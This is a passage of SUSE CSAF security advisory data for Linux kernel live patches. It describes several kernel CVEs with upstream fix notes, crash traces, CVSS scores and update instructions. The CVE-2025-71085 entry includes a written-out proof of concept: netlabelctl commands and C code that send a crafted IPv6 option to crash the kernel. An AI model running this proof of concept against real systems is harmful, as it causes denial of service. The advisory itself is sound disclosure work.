"cve": "CVE-2025-38159",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38159"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds\n\nSet the size to 6 instead of 2, since \u0027para\u0027 array is passed to\n\u0027rtw_fw_bt_wifi_control(rtwdev, para[0], \u0026para[1])\u0027, which reads\n5 bytes:\n\nvoid rtw_fw_bt_wifi_control(struct rtw_dev *rtwdev, u8 op_code, u8 *data)\n{\n ...\n SET_BT_WIFI_CONTROL_DATA1(h2c_pkt, *data);\n SET_BT_WIFI_CONTROL_DATA2(h2c_pkt, *(data + 1));\n ...\n SET_BT_WIFI_CONTROL_DATA5(h2c_pkt, *(data + 4));\n\nDetected using the static analysis tool - Svace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38159",
"url": "https://www.suse.com/security/cve/CVE-2025-38159"
},
{
"category": "external",
"summary": "SUSE Bug 1245751 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1245751"
},
{
"category": "external",
"summary": "SUSE Bug 1257629 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1257629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T12:34:25Z",
"details": "important"
}
],
"title": "CVE-2025-38159"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T12:34:25Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T12:34:25Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T12:34:25Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T12:34:25Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T12:34:25Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_116-default-11-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T12:34:25Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1044-1
Vulnerability from csaf_suse - Published: 2026-03-25 17:54 - Updated: 2026-03-25 17:54Summary
Security update for the Linux Kernel (Live Patch 70 for SUSE Linux Enterprise 12 SP5)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 70 for SUSE Linux Enterprise 12 SP5)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 4.12.14-122.266 fixes various security issues
The following security issues were fixed:
- CVE-2022-50423: ACPICA: Fix use-after-free in acpi_ut_copy_ipackage_to_ipackage() (bsc#1250785).
- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).
- CVE-2022-50756: nvme-pci: fix mempool alloc size (bsc#1256217).
- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).
- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1044,SUSE-SLE-Live-Patching-12-SP5-2026-1044
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
